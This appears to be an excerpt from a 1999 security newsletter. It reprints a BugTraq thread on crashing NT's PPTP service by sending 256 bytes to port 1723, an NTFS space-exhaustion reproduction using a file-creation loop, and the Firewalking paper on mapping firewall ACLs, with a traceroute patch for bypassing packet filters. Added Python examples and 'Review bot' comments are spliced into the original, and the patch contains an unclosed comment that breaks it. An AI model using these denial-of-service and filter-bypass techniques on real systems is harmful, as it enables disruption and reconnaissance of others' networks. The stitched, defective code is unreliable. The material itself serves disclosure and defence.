       [root@blobby /root]# telnet <removed for privacy> 1723
       Trying <removed for privacy>...
       Connected to <removed for privacy>.
       Escape character is '^]'
       hhhhhhhhhhhhhhh<type 256 times>
       ^d (not shown in output)
       ^]
       telnet> close
       Connection closed.
       
       The instant I hit ^d his server rebooted. AFAIK there is nothing special in
       the setup of the NT server.
       
       I hope this clears up the picture.
       
       Cheers
       
       Simon
       
       ------------------------------------------------------------------------------
       
       Date: Tue, 27 Apr 1999 10:55:52 -0700
       From: Aleph One <aleph1@UNDERGROUND.ORG>
       To: BUGTRAQ@netspace.org
       Subject: Re: Possible DOS in WinNT RAS (PPTP)
       
       Summary of this thread.
       
       Didn't work:
       
       NT 4.0 SP4, RRAS - Chris Alliey <calliey@erols.com>
       NT 4.0 Server SP3, 128-bit, no RAS - Russ <Russ.Cooper@rc.on.ca>
       NT 4.0 Server SP3, PPTP3-fix, no RAS 128-bit - Russ <Russ.Cooper@rc.on.ca>
       NT 4.0 Server SP4, 128-bit, no RAS - Russ <Russ.Cooper@rc.on.ca>
       NT 4.0 Server SP4 - Lewman, Andrew <ALewman@Lifespan.org>
       NT 4.0 Server Enterprise, SP4 - Lewman, Andrew <ALewman@Lifespan.org>
       
       Yes:
       
       NT 4.0 SP4, Option Pack - Huang Min <hmin@dns.cqpn.gov.cn>
       NT 4.0 Server, SP4, 40-bit, RAS - Simon Helson <simon@concepts.co.nz>
       
       
       Hardware or device driver error, or maybe an issue with RAS but not RRAS?
       
       --
       Aleph One / aleph1@underground.org
       http://underground.org/
       KeyID 1024/948FD6B5
       Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
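        What a PPTP listener should check before interpreting bytes that arrive on TCP 1723, as an added example that is not part of the thread: the fixed header layout and constants are taken from RFC 2637, and the Start-Control-Connection-Request built below is constructed with a zeroed body.

```python
"""Validate a PPTP control-connection header before processing it.

Added example, not from the BugTraq thread.  The layout comes from RFC 2637:
every control message starts with a 12-byte fixed header of Length, PPTP
Message Type, Magic Cookie, Control Message Type and Reserved0.  A listener
on TCP 1723 that checks these fields up front rejects arbitrary bytes such
as the 256 'h's described above instead of trying to interpret them.
"""
import struct

PPTP_MAGIC_COOKIE = 0x1A2B3C4D
PPTP_CONTROL_MESSAGE = 1                # PPTP Message Type for control messages
FIXED_HEADER = struct.Struct("!HHIHH")  # 12 bytes, network byte order
MIN_CONTROL_MESSAGE_TYPE = 1            # Start-Control-Connection-Request
MAX_CONTROL_MESSAGE_TYPE = 15           # Set-Link-Info
SCCRQ_LENGTH = 156                      # Start-Control-Connection-Request length


class PptpHeaderError(ValueError):
    """Raised for any input that is not a well-formed PPTP control header."""


def parse_control_header(data: bytes) -> dict:
    """Return the fixed-header fields, or raise PptpHeaderError.

    Checks are ordered so that random or hostile input fails fast: size,
    then the magic cookie, then the message type, then the length field,
    and only then the control message type.
    """
    if len(data) < FIXED_HEADER.size:
        raise PptpHeaderError(f"need {FIXED_HEADER.size} bytes, got {len(data)}")
    length, msg_type, cookie, ctrl_type, reserved = FIXED_HEADER.unpack_from(data)
    if cookie != PPTP_MAGIC_COOKIE:
        raise PptpHeaderError(f"bad magic cookie 0x{cookie:08x}")
    if msg_type != PPTP_CONTROL_MESSAGE:
        raise PptpHeaderError(f"unexpected PPTP message type {msg_type}")
    # Length counts the whole message including this header, so it can be
    # neither shorter than the header nor longer than the bytes we hold.
    if length < FIXED_HEADER.size or length > len(data):
        raise PptpHeaderError(f"length {length} inconsistent with {len(data)} bytes")
    if not MIN_CONTROL_MESSAGE_TYPE <= ctrl_type <= MAX_CONTROL_MESSAGE_TYPE:
        raise PptpHeaderError(f"unknown control message type {ctrl_type}")
    return {"length": length, "message_type": msg_type,
            "control_type": ctrl_type, "reserved": reserved}


def is_acceptable(data: bytes) -> bool:
    """True only for input that passes every header check."""
    try:
        parse_control_header(data)
    except PptpHeaderError:
        return False
    return True


def build_sccrq_header() -> bytes:
    """Constructed Start-Control-Connection-Request: valid header, zeroed body."""
    header = FIXED_HEADER.pack(SCCRQ_LENGTH, PPTP_CONTROL_MESSAGE,
                               PPTP_MAGIC_COOKIE, MIN_CONTROL_MESSAGE_TYPE, 0)
    return header + bytes(SCCRQ_LENGTH - FIXED_HEADER.size)


# The payload from the thread: 256 'h' bytes.  Read as a header its Length
# would be 0x6868 = 26728 and its Magic Cookie 0x68686868, so it never
# gets past the first checks.
GARBAGE = b"h" * 256

if __name__ == "__main__":
    print("SCCRQ accepted:", is_acceptable(build_sccrq_header()))
    try:
        parse_control_header(GARBAGE)
    except PptpHeaderError as err:
        print("256 x 'h' rejected:", err)
```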
       
       
       
       @HWA      
       
       
 14.0  MFT problem could cause you to have to reformat your drive (NTFS)
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
       Date: Tue, 27 Apr 1999 18:26:54 +0400
       From: Vladimir Dubrovin <vlad@sandy.ru>
       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       Subject: MFT problem
       
       Hello NTBUGTRAQ,
       
       Sorry for my bad English...
       
        Some time ago a problem with the MFT was noticed. I don't know if this
        problem has been discussed on this list, so if it has, just discard
        this message.
       
       The problem is:
       
        When creating a very large number of empty files on an NTFS partition and
        then removing these files you lose a lot of space (up to 90% of the
        volume!) and you can't recover this space without reformatting the
        NTFS volume. This problem occurs because NT allocates space in the MFT
        (Master File Table, an internal NTFS database). When the MFT reserved
        space runs out, NT allocates new space for the MFT. The space allocated
        for the MFT will never be released. (Information on "How NTFS Reserves
        Space for its Master File Table (MFT)" can be found in KB article Q174619.)
       
        When creating an empty file (with zero length) it takes disk space only
        in the directory entry and the MFT table. If you fill your NTFS volume
        with such files and then delete them, the MFT table will take most of
        your hard drive space (up to 90%, as was noted before).
       
        You can reproduce this problem the following way:
       
        It's better to use an empty NTFS volume of small size - 50-100Mb - the
        results will be more distinctive.
       
       Check the free space on your NTFS volume.
       
       md temp
       for /L %i in (1,1,1000000) do type nul >temp/file.%i.tmp
       
        When the partition is full of these files, abort the loop.
       
       del /Q temp\*.*
       del /Q temp
       
        Now you can check the free space on your hard drive. You've lost it
        almost completely...
       
        By the way: it seems
        dir /A $MFT
        doesn't show the real MFT size, as described in Microsoft
        documentation. At least you will never find the space you've lost in
        any special file. But you can try some other utility, such as
        defragmentation utilities - usually they show the MFT reserved space...
       
        The problem is that any user who has "create" permission in any
        directory on an NTFS volume can bring this volume down.
        It's especially interesting if your FTP server has an "incoming"
        directory, or you offer free HTML pages for your customers on an NTFS
        volume...
        
          This problem isn't solvable with any kind of disk quota,
        because the files are empty...
       
       
        I've contacted Vitaly Savenkov from the Russian department of Microsoft,
        russia@microsoft.com.
        He forwarded me a reply from the developers:
       
       <><><><><><><>
       Dear ...,
       I'm sorry that I have to tell you the following.
       -
       My investigations and the answers from our Secondary Response Group
       confirmed, that the $MFT will never shrink.
       The only way is to reformat the Partition.
       This behavior is the drawback resulting from optimizing the
       NTFS performance. The main goal was to avoid fragmentation.
       -
       Possibly the best resolution for your situation is to use a
       single partition for the FTP Data. If the available space then
       goes under an acceptable level you can backup this partition
       and reformat it.
       
        I checked this with our Escalation Team and so I can say that
        this behavior of NTFS will not be changed.
       
       best regards,
       ...
       <><><><><><><>
       
       So, now you can check it...
       
       
         +=-=-=-=-=-=-=-=-=+
         |Vladimir Dubrovin|
         | CSS Coordinator |
         | Sandy Info, ISP |
        =+=-=-=-=-=-=-=-=-=+=-=
       
       
       @HWA      
       
 15.0  Firewalking, a paper to determine gateway access control lists
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       From PacketStorm Security
       
       http://www.genocide2600.com/~tattooman/unix-audit/firewalk/
 
       ------------------------------------------------------------------------------------
 
                                        Firewalking
       
           A Traceroute-Like Analysis of IP Packet Responses to Determine Gateway
                                   Access Control Lists
       
       
       Cambridge Technology Partners'
       Enterprise Security Services
       
       
       
       David Goldsmith
       Senior Security Architect
       dhg@es2.net
       
       Michael Schiffman
       Senior Security Architect
       mds@es2.net
       
       October 1998
       
       
       Contents of this document are Copyright (c) 1998 Cambridge Technology Partners
       Enterprise Security Services, Inc.  Distribution is unlimited under the
       condition that due credit is given and no fee is charged.
       
       ESS is a division of Cambridge Technology Partners, Inc.
       
       
       TABLE OF CONTENTS
       
       i.      Terminology
       ii.     A note about examples
       I.      Introduction
       II.     Traceroute
       III.    Information gathering using traceroute
       IV.     Firewalking
       V.      Firewalk - The tool
        VI.     Risk Mitigation
       
       
       i. Terminology
               
       ACL             Access Control List.  A set of rules that enforce a security
                       policy.  In the scope of this paper, an Access Control List
                       will solely apply to network policy.
       Router/Gateway  Used interchangeably.  In the scope of this report, they refer
                       to a multi-homed host that is configured to forward IP
                       datagrams.  It may or may not have a packet filtering ACL in
                       place that denies some network traffic.
       Ingress traffic Describes network traffic that originates from the outside
                       of a network perimeter and progresses towards the inside.
       Egress traffic  Describes network traffic that originates from the inside of a
                       network perimeter and progresses towards the outside.
       Firewall        Refers to a multi-homed host configured to forward IP
                       datagrams which uses a packet filtering ACL to control
                       network traffic.
       
       ii. A note about examples
       
       There are several sample traceroute dumps used in this report.  The astute
       reader will note that the IP addresses are RFC 1918[1] compliant non-routable
       internal network addresses.  The empirical data and traceroute dumps are taken
        directly from live Internet hosts1, and in order to protect their identity,
       we have changed the addresses to anonymize the machines and networks involved.
       
       iii. A note about diagrams
       
        There are none in this ASCII version.  For the real deal, check out one of the
        graphical formats from http://www.es2.net/research/firewalk.
       
       
       I. Introduction
       
       This paper describes Firewalking, a technique that can be used to gather
       information about a remote network protected by a firewall.  The purpose
       of the paper is to examine the risks that this technique represents.  This
       paper is intended for a technical audience with an advanced understanding of
       network infrastructure and TCP/IP packet structures.
       
       Firewalking uses a traceroute-like IP packet analysis to determine whether or
       not a particular packet can pass from the attacker's host to a destination
       host through a packet-filtering device.  This technique can be used to map
        'open' or 'pass through' ports on a gateway.  Moreover, it can determine
       whether packets with various control information can pass through a given
       gateway.  Also, using this technique, an attacker can map routers behind a
       packet-filtering device.  To fully understand how this technique works, we
       first need to understand how traceroute works.  This paper provides an
       introduction to traceroute.
       
       
       
       II.     Traceroute
       
       Traceroute [1] is a network debugging utility designed to map out all hosts en
       route to a particular destination. Traceroute works by sending UDP or ICMP 
       echo (ping)2 packets to a destination host and monotonically increasing the
       time to live (TTL) field in the IP header each successive round (by default, a
       round consists of three packets or probes).  If the traceroute scan is done
       using UDP the destination port will be incremented with each probe sent.
       
       The IP TTL field is used to limit the lifetime of datagrams across the
       Internet and is decremented just before a router forwards a packet.  If this
       reduction would cause the TTL to be 0 or less, the router in question will
       send back an ICMP error message (time to live exceeded in transit) to the
       original host.  This lets the original host know at which router the packet
       expired.  By starting the TTL at one, routers between two given hosts can be
       found by increasing the TTL and monitoring the ICMP responses (provided there
       isn't any prohibitive filtering or any severe packet loss).  To ensure that it
       gets a proper response from the ultimate destination host (an ICMP port
       unreachable or an ICMP echo reply) traceroute will either pick a high UDP port
       that is unlikely to be used by any application or use ping packets.
       
       
       III.    Information gathering using traceroute
       
        With an understanding of how traceroute works, we can now explore how it can
        be used to leverage information about a particular network.  This section
        will demonstrate two different ways of using traceroute to do some network
        reconnaissance.  The following examples are contrived to show specific
        situations that may or may not be commonplace.
       
       
       
       - Protocol subterfuge
       
       The first scenario involves a network protected by a firewall that is blocking
       all ingress traffic except for ping and ping responses (ICMP types 8 and 0
       respectively).  We can use the stock traceroute program to show us what hosts
       are behind this filter (which is presumably against the security policy).
       
       Instead of the default behavior of using UDP (Figure 1), we want to force
       traceroute to use ICMP packets (Figure 2).  Notice that this time we are
       able to view hosts behind the firewall.
       
       
       zuul:~>traceroute 10.0.0.10
       traceroute to 10.0.0.10 (10.0.0.10), 30 hops max, 40 byte packets
        1  10.0.0.1 (10.0.0.1)  0.540 ms  0.394 ms  0.397 ms
        2  10.0.0.2 (10.0.0.2)  2.455 ms  2.479 ms  2.512 ms
        3  10.0.0.3 (10.0.0.3)  4.812 ms  4.780 ms  4.747 ms
        4  10.0.0.4 (10.0.0.4)  5.010 ms  4.903 ms  4.980 ms
        5  10.0.0.5 (10.0.0.5)  5.520 ms  5.809 ms  6.061 ms
        6  10.0.0.6 (10.0.0.6)  9.584 ms  21.754 ms  20.530 ms
        7  10.0.0.7 (10.0.0.7)  89.889 ms  79.719 ms  85.918 ms
        8  10.0.0.8 (10.0.0.8)  92.605 ms  80.361 ms  94.336 ms
        9  * * *
       10  * * *
       
                               Figure 1
       
       
       zuul:~>traceroute -I 10.0.0.10
       traceroute to 10.0.0.10 (10.0.0.10), 30 hops max, 40 byte packets
        1  10.0.0.1 (10.0.0.1)  0.540 ms  0.394 ms  0.397 ms
        2  10.0.0.2 (10.0.0.2)  2.455 ms  2.479 ms  2.512 ms
        3  10.0.0.3 (10.0.0.3)  4.812 ms  4.780 ms  4.747 ms
        4  10.0.0.4 (10.0.0.4)  5.010 ms  4.903 ms  4.980 ms
        5  10.0.0.5 (10.0.0.5)  5.520 ms  5.809 ms  6.061 ms
        6  10.0.0.6 (10.0.0.6)  9.584 ms  21.754 ms  20.530 ms
        7  10.0.0.7 (10.0.0.7)  89.889 ms  79.719 ms  85.918 ms
        8  10.0.0.8 (10.0.0.8)  92.605 ms  80.361 ms  94.336 ms
        9  10.0.0.9 (10.0.0.9)  94.127 ms  81.764 ms  96.476 ms
        10 10.0.0.10 (10.0.0.10) 96.012 ms  98.224 ms  99.312 ms
       
       
                               Figure 2
       
       
       - Nascent port seeding
       
       The second scenario involves a more common example of a network protected
       by a firewall which blocks all ingress traffic except for UDP port 53
       (Domain Name Service or DNS). 
       
       zuul:~>traceroute 10.0.0.10
       traceroute to 10.0.0.10 (10.0.0.10), 30 hops max, 40 byte packets
        1  10.0.0.1 (10.0.0.1)  0.540 ms  0.394 ms  0.397 ms
        2  10.0.0.2 (10.0.0.2)  2.455 ms  2.479 ms  2.512 ms
        3  10.0.0.3 (10.0.0.3)  4.812 ms  4.780 ms  4.747 ms
        4  10.0.0.4 (10.0.0.4)  5.010 ms  4.903 ms  4.980 ms
        5  10.0.0.5 (10.0.0.5)  5.520 ms  5.809 ms  6.061 ms
        6  10.0.0.6 (10.0.0.6)  9.584 ms  21.754 ms  20.530 ms
        7  10.0.0.7 (10.0.0.7)  89.889 ms  79.719 ms  85.918 ms
        8  10.0.0.8 (10.0.0.8)  92.605 ms  80.361 ms  94.336 ms
        9  * * *
       10  * * *
       
                               Figure 3
       
       
       As you can see from figure 3, the traceroute scan is blocked at the 8th
       hop because no traffic is allowed entrance into the network except for DNS
       queries. Armed with this knowledge, we can easily map hosts behind the gateway.
       
       We can control the following:
       
       * The starting source port of the traceroute (which, by default,
         increases monotonically as each probe is sent).
       * The number of probes sent each round (by default this is 3).
       
       We can determine the following:
       
       * The number of hops in between our attacking host and the target firewall.
         
       This information allows us to deterministically control the port number of the
       probe that will reach the firewall.  Due to the fact that the firewall does no
       content analysis, we can fool it into thinking our packets are DNS queries,
       and therefore, we can bypass the ACL.  We simply begin our scan with a
       starting port number of:
       
               (target_port - (number_of_hops * num_of_probes)) - 1
       
        If you are more than (target_port - 1) number of hops from your destination
       this method obviously will not work.  For our above example this gives us:
       
               (53 - (8 * 3)) - 1 = 28
       
       The probe that reaches the filter will have an acceptable port number as
       dictated by the firewall's ACL and will be allowed to pass unmolested
       (Figure 4).
       
       
       zuul:~>traceroute -p28 10.0.0.10
       traceroute to 10.0.0.10 (10.0.0.10), 30 hops max, 40 byte packets
        1  10.0.0.1 (10.0.0.1)  0.501 ms  0.399 ms  0.395 ms
        2  10.0.0.2 (10.0.0.2)  2.433 ms  2.940 ms  2.481 ms
        3  10.0.0.3 (10.0.0.3)  4.790 ms  4.830 ms  4.885 ms
        4  10.0.0.4 (10.0.0.4)  5.196 ms  5.127 ms  4.733 ms
        5  10.0.0.5 (10.0.0.5)  5.650 ms  5.551 ms  6.165 ms
        6  10.0.0.6 (10.0.0.6)  7.820 ms  20.554 ms  19.525 ms
        7  10.0.0.7 (10.0.0.7)  88.552 ms  90.006 ms  93.447 ms
        8  10.0.0.8 (10.0.0.8)  92.009 ms  94.855 ms  88.122 ms
        9  10.0.0.9 (10.0.0.9)  101.163 ms * *
       10  * * *
       
                               Figure 4
       
       
       You will notice that the scan terminates immediately after the target port
       is passed.  This is due to the fact that traceroute continues to increase
       the port numbers for each probe sent.  The probe immediately after the
       successful one will be denied by the ACL on the firewall.  To possibly get
       further, a simple modification to traceroute can be done to add a command
       line switch to stop port incrementation (Figure 5).  This allows us to force
       every probe we send to be acceptable to the firewall's ACL (a side effect
       being that we might not get the normal ICMP unreachable message from the
       ultimate destination due to the fact that there might actually be something
       listening on the other end).  See appendix A for the source code patch.
       
       
       zuul:~>traceroute -S -p53 10.0.0.15
       traceroute to 10.0.0.15 (10.0.0.15), 30 hops max, 40 byte packets
        1  10.0.0.1 (10.0.0.1)  0.516 ms  0.396 ms  0.390 ms
        2  10.0.0.2 (10.0.0.2)  2.516 ms  2.476 ms  2.431 ms
        3  10.0.0.3 (10.0.0.3)  5.060 ms  4.848 ms  4.721 ms
        4  10.0.0.4 (10.0.0.4)  5.019 ms  4.694 ms 4.973 ms
        5  10.0.0.5 (10.0.0.5)  6.097 ms  5.856 ms  6.002 ms
        6  10.0.0.6 (10.0.0.6)  19.257 ms  9.002 ms  21.797 ms
        7  10.0.0.7 (10.0.0.7)  84.753 ms * *
        8  10.0.0.8 (10.0.0.8)  96.864 ms  98.006 ms  95.491 ms
        9  10.0.0.9 (10.0.0.9)  94.300 ms *  96.549 ms
       10  10.0.0.10 (10.0.0.10)  101.257 ms  107.164 ms  103.318 ms
       11  10.0.0.11 (10.0.0.11)  102.847 ms  110.158 ms *
       12  10.0.0.12 (10.0.0.12)  192.196 ms  185.265 ms *
       13  10.0.0.13 (10.0.0.13)  168.151 ms  183.238 ms  183.458 ms
       14  10.0.0.14 (10.0.0.14)  218.972 ms  209.388 ms  195.686 ms
       15  10.0.0.15 (10.0.0.15)  236.102 ms  237.208 ms  230.185 ms
       
                               Figure 5
       
       
       - Taking it a bit further
       
       Since the magic of traceroute is all happening at the IP layer, any transport
       protocol (UDP, TCP and ICMP) can be used.  The foundation laid down by
        traceroute can extend to any other protocol on top of IP.  If we attempt to
       traceroute to a machine behind a firewall and the probe reaching the firewall
       is prohibited by an ACL filter, the packet will be dropped on the floor (in
       most cases).  All we can determine from the traceroute scan is the last
       gateway (in this case, a firewall) that responded.  This is good entropic
       information.  This firewall can then become a waypoint that we use to
       determine the success of future probes.  If we traceroute to a machine behind
       this firewall with a different (protocol) traceroute probe, and we get a
       response, we know two things: 1) that particular kind of traffic is passed by
       the firewall, and 2) we know a host behind the firewall.  If we only get as
       far as our waypoint, we know that traffic type is filtered.  This is the basis
       for firewalking.
       
       
       IV. Firewalking
       
       In order to use a gateway's response to gather information, we must know two
       pieces of information:
       
       - The IP address of the last known gateway before the firewalling takes place 
       - The IP address of a host located behind the firewall.
       
       The first IP address serves as our metric (waypoint from the above example),
       if we can't get a response past that machine, then we assume that whatever
       protocol we tried to pass is being blocked3.  The second IP address is used as
       a destination to direct the packet flow (Figure 6).
       
                               [ image ]
       
       Using this technique, we can perform several different information gathering
       attacks.  One attack is a firewall protocol scan, which will determine what
       ports/protocols a firewall will let traffic through on from the attacking
       host.  This would attempt to pass packets on all ports and protocols and
       monitor the responses.  A second potential threat is advanced network mapping.
       By sending packets to every host behind a packet filter, an attacker can
       generate an accurate map of a network's topology.
       
       
       
       
       
       
       V. Firewalk - The tool
       
       While traceroute is a useful application, it is not very extensible for any
       kind of serious reconnaissance scanning; to this end, the proof of concept
       tool, firewalk, was built.
       
       - Fire, walk with me where?
       
       Firewalk is a network-auditing tool that employs the techniques described
        above.  It attempts to determine what transport protocols a given gateway
        will let through.  The firewalk scan works by sending out TCP or UDP packets
        with an IP TTL one greater than the targeted gateway.  If the gateway allows
       the traffic, it will forward the packets to the next hop where they will
       expire and elicit a TTL exceeded in transit message.  If the gateway host does
       not allow the traffic, it will likely drop the packets on the floor and we
       will see no response.  By sending probes in a successive manner and recording
       which ones answer and which ones don't, the access list on the gateway can be
       determined.
       
       - 2 Phases
       
       To work its magic, firewalk has two phases, a network discovery phase, and a
       scanning phase.  Initially, to get the correct IP TTL (that will result in 
       expired packets one beyond the gateway) we need to 'ramp up' hop counts.  We
       do TTL ramping in the same manner that traceroute works, sending packets out
       with successively incremented IP TTLs, towards the destination host.  Once
       we know the gateway hopcount (at that point the scan is 'bound') we can move
       onto the next phase, the actual scan.
       
        The actual scan is simple.  Firewalk sends out TCP or UDP packets and sets
        a timeout.  If it receives a response before the timer expires, the port is
        considered open; if it doesn't, the port is considered closed (Figure 7).
       
       
        zuul:#firewalk -n -P1-8 -pTCP 10.0.0.5 10.0.0.20
        Firewalking through 10.0.0.5 (towards 10.0.0.20) with a maximum of 25 hops.
        Ramping up hopcounts to binding host...
        probe:  1  TTL:  1  port 33434:  <response from> [10.0.0.1]
        probe:  2  TTL:  2  port 33434:  <response from> [10.0.0.2]
        probe:  3  TTL:  3  port 33434:  <response from> [10.0.0.3]
        probe:  4  TTL:  4  port 33434:  <response from> [10.0.0.4]
        probe:  5  TTL:  5  port 33434:  Bound scan: 5 hops <Gateway at 5 hops> [10.0.0.5]
        port   1: open
        port   2: open
        port   3: open
        port   4: open
        port   5: open
        port   6: open
        port   7: *
        port   8: open
        13 packets sent, 12 replies received

                                Figure 7
       
       
       
       - A Slow Walk
       
        As noted above, packets on an IP network can be dropped for a variety of
        reasons.  When a packet is dropped for any reason other than it being denied
        by a filter, it is extraneous loss.  For our firewalk scan to be accurate,
        we need to limit this extraneous packet loss to the best of our ability.  The
        best we can do in most cases is to be redundant with the number of probes
        we send.  Unless there is severe network congestion, some of the probes should
        get through.  However, what if the probe we send is filtered or dropped by a
        different gateway while en route to the target gateway (see Figure 8)?
       
       
                               [ image ]
       
        To firewalk, this will look like the target gateway has denied the packet,
        which, in this case, is certainly a false negative.  This is not extraneous
        loss, so simply sending more packets will not help.  To prevent this, we must
        perform a `slow walk` or a `creeping walk`.  This is akin to a normal scan,
        except that we scan each hop en route to the target.  We perform a standard
        firewalk ramping phase, and then scan each intermediate hop up to the
        destination.  This prevents false negatives due to intermediate filter
        blockage and allows firewalk to be more confident in its report.  The major
        benefit is that we can now determine if blocked ports are false negatives.
        The drawback is that it is, as its name states, slow.
        
       More information about Firewalk (including the source) is available from
       http://www.es2.net/research/firewalk.  
       
       VI. Risk Mitigation
       
       The easiest solution to this problem is to disallow ICMP TTL Exceeded
       messages from leaving an internal network.  This will also have the effect
       of breaking valid uses of traceroute and may inhibit remote diagnostics of
       an internal network problem.
       
       Another defense against firewalking is the use of some form of proxy server.
       Network Address Translation (NAT) or any proxy server (both application
       level and circuit level) can prevent Firewalk from probing behind them.  While
       network based intrusion detection tools could detect certain attacks [3];
       it is possible to develop a version of Firewalk that would generate packets
       that would look like valid packets for each service that it is scanning.
       Currently, Firewalk only fills in the packet header and does not insert any
       data into a packet.  A more sophisticated version could emulate various
       services in an attempt to masquerade as valid traffic and randomize the order
       and times that it scans services.    
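        The two phases described above (a TTL ramp that ends in a bound probe, then a
        fixed-TTL sweep across ports or hosts) leave a recognisable pattern in a packet
        filter's logs, which is the detection angle this section alludes to.  The
        following is an added example, not code from the Firewalk paper or tool; it
        assumes a constructed, netfilter-like log format in which TTL is the value as
        received at the filter, so the bound probe arrives with TTL 1 and the scan
        probes with TTL 2.

```python
import re
from collections import defaultdict

# Constructed log format, loosely modelled on netfilter LOG output.  Assumption:
# TTL is the value as received on the wire at this filter, so the probe that
# 'binds' the scan arrives with TTL 1 and the scan probes arrive with TTL 2
# (they are meant to expire one hop past this filter).
LOG_RE = re.compile(
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?TTL=(?P<ttl>\d+) .*?"
    r"PROTO=(?P<proto>TCP|UDP) .*?DPT=(?P<dpt>\d+)"
)
BOUND_TTL = 1   # ramp probe that expires on this hop (firewalk's "Bound scan")
SCAN_TTL = 2    # scan probes: expire at the next hop, eliciting TTL exceeded


def parse_line(line):
    """Extract src, dst, ttl, proto and dport from one log line, or None."""
    m = LOG_RE.search(line)
    if m is None:
        return None
    return {"src": m["src"], "dst": m["dst"], "ttl": int(m["ttl"]),
            "proto": m["proto"], "dport": int(m["dpt"])}


def detect_firewalk(lines, min_sweep_ports=5):
    """Flag sources whose traffic fits the two phases of a firewalk scan.

    Phase 1 (ramp): at least one probe arrives with TTL == BOUND_TTL.
    Phase 2 (scan): min_sweep_ports or more distinct (proto, port) pairs arrive
    with TTL == SCAN_TTL.  A sweep across many DST hosts at that TTL is the
    network-mapping variant, so the probed hosts are reported as well.
    Returns {src: {"ramp_seen": bool, "sweep_ports": [...], "hosts_probed": [...]}}.
    """
    ramp_sources = set()
    sweeps = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["ttl"] == BOUND_TTL:
            ramp_sources.add(rec["src"])
        elif rec["ttl"] == SCAN_TTL:
            sweeps[rec["src"]].add((rec["dst"], rec["proto"], rec["dport"]))

    findings = {}
    for src, probes in sweeps.items():
        ports = {(proto, port) for _, proto, port in probes}
        if len(ports) < min_sweep_ports:
            continue
        findings[src] = {
            "ramp_seen": src in ramp_sources,
            "sweep_ports": sorted({port for _, port in ports}),
            "hosts_probed": sorted({dst for dst, _, _ in probes}),
        }
    return findings


# Constructed sample: one firewalk-style scan of ports 1-8 (as in Figure 7)
# from 203.0.113.7, plus ordinary traffic from another host and a junk line.
SAMPLE_LOG = [
    "FW IN=eth0 OUT= SRC=203.0.113.7 DST=192.0.2.20 LEN=40 TTL=1 ID=1 "
    "PROTO=UDP SPT=53 DPT=33434 LEN=20",
] + [
    f"FW IN=eth0 OUT=eth1 SRC=203.0.113.7 DST=192.0.2.20 LEN=40 TTL=2 ID={100 + p} "
    f"PROTO=TCP SPT=53 DPT={p} WINDOW=0 SYN"
    for p in range(1, 9)
] + [
    "FW IN=eth0 OUT=eth1 SRC=198.51.100.9 DST=192.0.2.20 LEN=60 TTL=54 ID=7 "
    "PROTO=TCP SPT=40000 DPT=80 WINDOW=65535 SYN",
    "FW IN=eth0 OUT=eth1 SRC=198.51.100.9 DST=192.0.2.20 LEN=60 TTL=54 ID=8 "
    "PROTO=TCP SPT=40001 DPT=443 WINDOW=65535 SYN",
    "kernel: eth0: link is up",
]

if __name__ == "__main__":
    for src, info in detect_firewalk(SAMPLE_LOG).items():
        print(f"{src}: ramp_seen={info['ramp_seen']} ports={info['sweep_ports']} "
              f"hosts={info['hosts_probed']}")
```

        A slow walk (scanning each intermediate hop) shows up as the same sweep
        repeated at several low TTL values, so a production rule would widen SCAN_TTL
        to a small range rather than a single value.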
       
       
       Appendix A. traceroute static port diff
       
       Apply this diff to traceroute version 1.4a5 to add support for static
       destination ports.  Apply the diff using the unix patch program from the
       traceroute source directory:
       
       ---------------------8<-------- traceroute.diff ------------------------------
       --- traceroute.c.orig   Fri Aug 21 15:15:23 1998
       +++ traceroute.c        Sun Aug 23 18:58:08 1998
       @@ -289,6 +289,7 @@
        int nprobes = 3;
        int max_ttl = 30;
        int first_ttl = 1;
       +int static_port = 0;
        u_short ident;
        u_short port = 32768 + 666;    /* start udp dest port # for probe packets */
       
       @@ -352,7 +353,7 @@
                       prog = argv[0];
       
               opterr = 0;
       -       while ((op = getopt(argc, argv, "dFInrvxf:g:i:m:p:q:s:t:w:")) != EOF)
       +       while ((op = getopt(argc, argv, "dFInrvxf:g:i:m:p:q:Ss:t:w:")) != EOF)
                       switch (op) {
       
                       case 'd':
       @@ -406,6 +407,13 @@
                               options |= SO_DONTROUTE;
                               break;
       
       +               case 'S':
       +                       /*
       +                        * Tell traceroute to not increment the destination
       +                        * port, useful for bypassing some packet filters.
       +                        * Useless without the -p option.
       +                       static_port = 1;
       +                       break;
                       case 's':
                               /*
                                * set the ip source address of the outbound
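        Review bot: the `/*` opened in the new `case 'S':` block is never closed before `static_port = 1;` and `break;`, so those two statements and the `case 's':` label that follows stay inside the comment until the next `*/`; -S would be accepted by getopt but never set the flag, and the -s case would lose its label.  Add a closing `*/` after `* Useless without the -p option.`.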
       @@ -744,7 +752,7 @@
                               register struct ip *ip;
       
                               (void)gettimeofday(&t1, &tz);
       -                       send_probe(++seq, ttl, &t1);
       +                       send_probe(static_port ? seq : ++seq, ttl, &t1);
                               while ((cc = wait_for_reply(s, from, &t1)) != 0) {
                                       (void)gettimeofday(&t2, &tz);
                                       i = packet_ok(packet, cc, from, seq);
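        Review bot: with `static_port` set, `seq` is never advanced, so every probe goes out with the same sequence value and `packet_ok(packet, cc, from, seq)` can no longer distinguish a late reply to an earlier probe from the reply to the current one.  Consider keeping a separate counter for the destination-port offset so that `seq` still increments per probe, or at least state in the -S comment that reply matching is weakened in this mode.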
       @@ -1300,9 +1308,9 @@
               extern char version[];
       
               Fprintf(stderr, "Version %s\n", version);
       -       Fprintf(stderr, "Usage: %s [-dFInrvx] [-g gateway] [-i iface] \
       -[-f first_ttl] [-m max_ttl]\n\t[ -p port] [-q nqueries] [-s src_addr] [-t tos] \
       -[-w waittime]\n\thost [packetlen]\n",
       +       Fprintf(stderr, "Usage: %s [-dFInrSvx] [-g gateway] [-i iface] \
       +[-f first_ttl]\n\t[-m max_ttl] [ -p port] [-q nqueries] [-s src_addr] \
       +[-t tos]\n\t[-w waittime] host [packetlen]\n",
                   prog);
               exit(1);
        }
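        Review bot: the usage string now advertises -S, but nothing tells the user that it only has an effect together with -p (as the comment in the 'S' case says).  A short note in the usage text or the man page, e.g. `[-S (with -p)]`, would avoid confusion.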
       
